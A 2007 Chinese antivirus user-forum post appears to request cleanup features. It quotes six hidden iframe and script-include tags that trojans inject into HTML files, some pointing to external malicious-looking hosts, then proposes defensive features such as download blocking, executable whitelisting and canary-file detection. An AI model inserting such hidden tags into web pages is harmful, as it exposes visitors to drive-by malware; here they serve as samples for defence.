金山毒霸的官方论坛。。
双击看一下就知道瑞星为什么会XX这种东西了,难道antivir不报iframe之后瑞星开始XX了?
金山清理专家能否增加删除所有网页HTM文件中特定字符串(可由用户自定义的)功能!
金山清理专家能否增加删除所有网页HTM文件中特定字符串(可由用户自定义的)功能!
现在很多流氓软件木马都会在所有asp,htm,HTML等文件前面或后面加上如下类似的病毒框架页面:
<script src=http://67.19.116.187/1.js></script>
<iframe src=http://www.puma166.com/1.htm width=0 height=0></iframe>
<IFRAME SRC=http://mm.987999.com/abc.htm width=1 height=1 frameborder=0></IFRAME>
<IFRAME SRC="http://rrr.rfhwfhw.com/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>
<IfrAmE src=http://127.0.0.1/test.htm width=0 height=0></IfrAmE>
但杀毒后不是被隔离,实际上文件我们是要的,就是无法删除这些文本html代码!(因为有单字节换行符问题)!
手工删除又太慢,试过一些自动替换软件也因为"单字节换行符问题"无法替换!
建议毒霸2008考虑功能:
a.上网弹出窗口拦截,要能拦截有些恶意网站的脚本弹窗(无限个)的脚
本但不影响其他正常网站的脚本程序!,要有白黑名单地址拦截(包
括点击的连接和地址栏)!
2
b.无法拦截时有热键关闭上网程序功能(可以自定义上网程序进程名),
因为无法拦截时已没有系统资源调出任务管理器!
2
c.能拦截任何打开网页自动下载的程序(如流氓软件‘1.exe’),让用
户选择是否允许下载执行及是否加入白黑名单,通过白黑名单设定不拦
截正常如ppstream(tv.etshow.net) 网络电视电影插件!
2
d.白黑名单设定指定路径的本机程序是否允许修改可执行文件(*.exe,*.htm等)及打开方式!
即可执行文件放火墙,除系统程序外只有用户允许的才可以运行、修
改,创建可执行文件或脚本、批处理等文件!
2
e.禁止执行“autorun.inf”(软件修改注册表实现),自动删除autorun.inf及其内
指向的可执行程序文件!
2
f.病毒捕获功能
首先软件要安装时随机产生主程序名及安装目录并加入到白黑名单中防止
自己被病毒关闭, 再由软件在根目录及系统目录中产生随机文件名的程序
文件(大小也随机产生500k-5m), 再拷贝一份这个程序文件到软件安装目录
改名为*.txt之类非可执行文件扩展名,软件设定每10分钟比对一次这几个可
执行文件和拷贝改名后的文件是否一样,不一样则被病毒感染,被改动的程序
就是新病毒样本!即可及时发现捕获未知病毒! |
发表于 2007-11-9 12:10:47
楼主
,JS还是哪?